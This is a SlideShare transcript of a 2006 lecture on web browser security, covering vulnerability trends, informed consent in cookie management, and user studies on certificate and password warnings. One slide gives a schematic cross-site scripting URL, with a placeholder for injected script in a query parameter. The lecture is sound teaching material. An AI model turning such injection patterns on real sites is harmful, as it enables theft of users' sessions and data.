Your SlideShare is downloading. ×
Web browser privacy and security
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Web browser privacy and security

2,072
views

Published on

www.secguru.com

www.secguru.com

Published in: Economy & Finance, Technology

0 Comments
4 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
2,072
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
0
Comments
0
Likes
4
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide
  • Transcript

    • 1. Web browser privacy and security (I) March 21 st , 2006 Ricardo Villamarin-Salomon
    • 2. Outline
      • Web Browser In security
      • Informed Consent by Design
      • Hardening Web Browsers Against Man in the Middle and Eavesdropping Attacks
      • Participation
    • 3. Web Browser Insecurity
      • Targeted attacks on Web applications and Web browsers are increasingly becoming the focal point for cyber criminals.
        • Traditional attack activity : motivated by curiosity and a desire to show off technical virtuosity
        • Current threats are motivated by profit: identity theft, extortion, and fraud, for financial gain.
    • 4. Source : secunia.com Date: 2006-March-19 Original Idea : ZDNet.com Revision & Update (March 2006) : me Worry-free web?
    • 5. Web Browser vulnerabilities, vendor confirmed Source: Symantec Internet Security Threat Report (Vol. IX)
    • 6. Web Browser vulnerabilities, confirmed & non-confirmed by vendor Source: Symantec Internet Security Threat Report (Vol. IX)
    • 7. Some Common Vulnerabilities (CERT)
      • ActiveX Controls
      • Java applets (bypassing of sandbox’s restrictions)
      • Cross-Site Scripting (mainly faults of web sites)
        • e.g, http://host.com/modules.php?op=modload&name=XForum&file= [hostilejavascript] &fid=2
      • Cross-Zone and Cross-Domain Vulnerabilities
        • Prevention of a web site from accessing data in a different domain (or zone) is broken
      • Malicious Scripting, Active Content, and HTML
      • Spoofing As it relates to web browsers, spoofing is a term used to describe methods of faking various parts of the browser user interface.
    • 8. Informed Consent for Information Systems Batya Friedman, Peyina Lin, and Jessica K. Miller
    • 9. Value Sensitive Design
      • Design of Information and Computer Systems that accounts for human values
      • Value Sensitive Design is an interactional theory
        • In general, we don’t view values as inherent in a given technology
        • However, we also don’t view a technology as value-neutral
        • Rather, some technologies are more suitable than others for supporting given values
      • Key task of VSD: Investigate these “value suitabilities” (along with what values and whose values)
      © Batya Friedman 2003
    • 10. VSD’s Tripartite Methodology
      • Conceptual investigations
        • Philosophically informed analyses of the values and value conflicts involved in the system
      • Technical investigations
        • Identify existing or develop new technical mechanisms; investigate their suitability to support or not support the values we wish to further
      • Empirical investigations
        • Using techniques from the social sciences, investigate issues such as: Who are the stakeholders? Which values are important to them? How do they prioritize these values?
      • These are applied iteratively and integratively
      © Batya Friedman 2003
    • 11. Direct and Indirect Stakeholders
      • Direct stakeholders: Interact with the system being designed and its outputs
      • Indirect stakeholders: Don’t interact directly with the system, but are affected by it in significant ways
      © Batya Friedman 2003
    • 12. Model of Informed Consent for Information Systems
      • Disclosure
      • Comprehension
      • Voluntariness
      • Competence
      • Agreement
      • Minimal Distraction
    • 13. NS 3.04 Cookie Warning Dialog Box
    • 14. NS 4.03 Cookie Settings
    • 15. IE 4.0 Cookie Warning Dialog Box
    • 16. IE 5.0 Custom Cookie Settings
    • 17. The Unique Role of the Web Browser
      • Browser software mediates communication between a client (typically an end user) and a server
      • After a remote site has exercised a capability, the Web browser software has no control over what the remote site does with the information or other actions that the site may take.
    • 18. The Unique Role of the Web Browser
      • With respect to Information Consent
        • Disclosure:
          • Whether the user is notified about a server request
          • Harms / Benefits?
        • Comprehension: (to a large extent)
          • Controls the content of the notification (if any)
        • Agreement:
          • User’s opportunity to agree/decline to place a cookie (prompting)
          • Ongoing : how to withdraw from agreement (obscure locations)?
    • 19. The Unique Role of the Web Browser
      • With respect to Information Consent
        • Minimal distraction
          • IE: acceptance/declination of third party cookies by the user (one by one)
        • Voluntariness?
          • Browser or Website?
        • Competence (cookies)?
          • Browser or Website?
    • 20. Design Goals
      • Enhance users’ local understanding of cookie events as the events occur with minimal distraction to the user
        • Preset agreement policy that applies to all cookies of a specified type
          • Minimizes user distraction at the expense of rote decision-making, disclosure and comprehension
        • Explicitly accept or decline each cookie one at a time
          • Supports the criterion of disclosure but at the expense of extreme distraction
        • Middle ground?
    • 21. Design Goals
      • Enhance users’ global understanding of the common uses of cookie technology
        • Including potential benefits and risks associated with those uses
        • A necessary piece of disclosure and comprehension
    • 22. Design Goals
      • Enhance users’ ability to manage cookies
        • Particularly with respect to the easy viewing of cookie information and on-going control over the lifetime and removal of cookies.
        • Agreement is ongoing: the user had no easy means (1999 browser technology) to remove the previously set cookies and thereby revoke consent
      • Achieve design goals 1, 2 and 3 while minimizing distraction for the user
    • 23. © Batya Friedman 2003
    • 24. © Batya Friedman 2003
    • 25. © Batya Friedman 2003
    • 26. © Batya Friedman 2003
    • 27. © Batya Friedman 2003
    • 28.  
    • 29.  
    • 30. Renamed to “Cookie-Panel”
      • https://addons.mozilla.org/extensions/moreinfo.php?id=1375
    • 31.
      • Informing through interaction Design
      Secure Connections
    • 32. Secure Connections: Different Evidences For a suspicious (!) site, the Address bar turns yellow and displays a warning label but still allows data entry
      • … we turn the entire address bar a bright shade of yellow at secure sites
      • It's impossible to miss;
      • the connection with the page “ is clear ” because it highlights the page address;
      • and it's “ obvious ” what it means because it's punctuated by a large lock
      • - Blake Ross ..
      Firefox IE 7 Beta
    • 33. Secure Connections: Your opinion? Fits in the status bar (IE 6) No encryption Secure Connection (Certificate is OK) “ Secure” Connection (Problem with Certificate)
    • 34. GMail: Questions related to Informed Consent
      • Machines reading personal content
        • … a privacy violation concerns the act of intrusion upon the self, independent of the state of mind (or knowledge) of the intruder - Edward Bloustein
        • Spam filters?
      • Indirect stakeholders
        • targeted advertisements should not be allowed without the consent of all parties involved in an email exchange. Gmail does not obtain the consent of the email sender. How?
        • Automatic reply: once (the first time) and for all make the sender agree with Gmail TOS (something similar to mailblocks.com for verifying that an email was sent by a human)
    • 35. Hardening Web Browsers Against Man in the Middle and Eavesdropping Attacks Haidong Xia and Jose Carlos Brustoloni
    • 36. Usability of Web Browser security
      • Man-In-The-Middle (MITM) attacks
      • Eavesdropping attacks
      • Several tools available
    • 37. Man-In-The-Middle (MITM) attacks
      • The public keys of major CAs (e.g., Verisign) are embedded in many client applications (e.g.,Web browsers).
    • 38. Common sources of Ct. verification failure
      • The browser may not know the public key of the CA that issued the server’s certificate
        • Internal web server (only by members of the organization)
        • Own CA: public key installed in browser (no verification errors)
        • Large number of users / User owned computer
      • Issuer’s or the server’s certificate may be expired
    • 39. Common sources of Ct. verification failure
      • Server may have presented a certificate whose common name field does not match the server’s fully qualified domain name
        • Attacker can use his own identity with a CA generated certificate
        • Attacker may have stolen the Ct. (along with the private key)
        • Mismatches at subdomain level not very risky (unless a very sophisticated attack is mounted)
          • Allow user to proceed
        • Other cases more serious
          • Ch. 28
    • 40. Common sources of Ct. verification failure
    • 41. Common sources of Ct. verification failure
    • 42. Context Sensitive Certificate Verification
      • Clarify the relationship between the user and the server’s (non verified) certificate
        • Not giving the user override mechanisms
      • Distribute signed certificates of the internal servers out of band
      • Take advantage of typically unused Ct’s fields:
        • CA’s contact information ( field: issuer alternative name )
        • CA administrator’s name, address, telephone and fax numbers, and work hours.
    • 43. Context Sensitive Certificate Verification
    • 44.  
    • 45.  
    • 46. Specific Passwords Warnings
      • Helps prevent eavesdropping
      • Allow overriding
    • 47. Specific Passwords Warnings
    • 48. Specific Passwords Warnings
    • 49. User Studies
      • Computer literate users (CLU)
      • Evaluate:
        • Likelihood of successful attack in representative security-sensitive Web applications
        • Possibility of “foolproofing” web browsers, so they can be used securely even by untrained CLUs
        • Can education about the relevant security principles, attacks, and tools improve the security of how users browse the Web?
          • Note: This last hypothesis is not covered in this presentation
    • 50. Study’s Design
      • 17 participants (majors from Pitt’s CS department)
      • Two studies:
        • Unmodified browser (IE)
        • Modified Mozilla Firebird 0.6.1 with CSCV and SPW
      • No feedback given between these two studies
    • 51. Study’s Design
      • Visit three fictional but realistic Web sites where students were assigned password protected accounts
      • The first site: maintained by the students’ university.
        • It allows students to monitor the respective reward points (earned by doing well in exams, independent studies, etc.)
        • HTTPS + Certificate issued by internal CA
      • The second site: m. by a remote e-merchant not affiliated with U.
        • Students can spend their reward points, (e.g. to buy books, CDs, etc.)
        • HTTPS + bogus certificate
      • The third site provides access to users’ Web email accounts
        • HTTP only (no certificate)
    • 52. Study’s Design 100 Choosing not to access to 2nd and 3rd site insecurely 100 Correctly obtained and installed the issuing CA’s certificate 50 Simply did not visit the site insecurely 0 Access to a site despite lack of security Score (points) User’s Action
    • 53. Study’s Results
      • With current users and Web browsers, the mentioned attacks are alarmingly likely to succeed.
        • More often than not, users’ behavior defeats the existing Web security mechanisms.
      • CSCV blocked MITM attacks against HTTPS-based applications completely.
      • SPW greatly reduced the insecure transmission of passwords in an HTTP-based application
      • Although untrained, users had little trouble using CSCV and SPW.
    • 54. Participation
    • 55. Disagreements about Secure Connections
      • Propose some ideas for representing secure connections in web browsers
    • 56. Thank you!